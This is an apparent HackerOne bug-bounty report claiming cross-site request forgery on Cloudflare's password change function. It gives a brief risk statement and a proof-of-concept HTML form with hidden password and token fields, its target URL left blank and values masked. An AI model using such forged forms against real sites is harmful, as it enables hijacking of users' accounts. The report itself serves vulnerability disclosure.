Cloudflare: csrf on password change functionality

ID H1:8849
Type hackerone
Reporter robincool03111
Modified 2014-09-07T17:00:26


It was observed that the web application ‘’ is vulnerable to cross site request forgery attacks via FORM field reconstruction.

Risk : An attacker could force an already authenticated user to perform actions that he or she didn’t intend to do, such as account creation, Updating account information, retrieval of account information, or any other functions provided by the application. Attacker could even gain administrative control of the application by tricking an administrative user to load the malicious content. .

<form action="" method="post">

<input type="hidden" name="user_pass_old" value="***"/>

<input type="hidden" name="user_pass_new" value="***"/>

<input type="hidden" name="user_pass_new2" value="**"/>

<input type="hidden" name="atok" value="1398143127-85cac144fb01c8f70e1c" />

<input type="submit" name="act" value="update_pass" />